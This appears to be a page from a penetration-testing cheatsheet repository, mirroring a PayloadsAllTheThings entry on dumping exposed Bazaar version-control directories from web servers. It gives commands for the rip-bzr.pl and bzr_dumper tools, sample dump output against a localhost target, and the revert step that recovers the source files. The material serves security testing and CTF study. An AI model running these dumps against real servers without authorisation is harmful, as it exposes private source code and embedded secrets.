daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

bazaar.md (1791B)


      1 ---
      2 title: "Bazaar"
      3 topic: "Insecure Source Code Management"
      4 topicSlug: "insecure-source-code-management"
      5 sourcePath: "Insecure Source Code Management/Bazaar.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Source%20Code%20Management/Bazaar.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Bazaar
     12 
     13 > Bazaar  (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18     * [rip-bzr.pl](#rip-bzrpl)
     19     * [bzr_dumper](#bzr_dumper)
     20 * [References](#references)
     21 
     22 ## Tools
     23 
     24 ### rip-bzr.pl
     25 
     26 * [kost/dvcs-ripper/rip-bzr.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl)
     27 
     28     ```powershell
     29     docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
     30     ```
     31 
     32 ### bzr_dumper
     33 
     34 * [SeahunOh/bzr_dumper](https://github.com/SeahunOh/bzr_dumper)
     35 
     36 ```powershell
     37 python3 dumper.py -u "http://127.0.0.1:5000/" -o source
     38 Created a standalone tree (format: 2a)
     39 [!] Target : http://127.0.0.1:5000/
     40 [+] Start.
     41 [+] GET repository/pack-names
     42 [+] GET README
     43 [+] GET checkout/dirstate
     44 [+] GET checkout/views
     45 [+] GET branch/branch.conf
     46 [+] GET branch/format
     47 [+] GET branch/last-revision
     48 [+] GET branch/tag
     49 [+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
     50 [*] Finish
     51 ```
     52 
     53 ```powershell
     54 bzr revert
     55  N  application.py
     56  N  database.py
     57  N  static/
     58 ```
     59 
     60 ## References
     61 
     62 * [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://web.archive.org/web/20200926122213/https://ctftime.org/writeup/13380)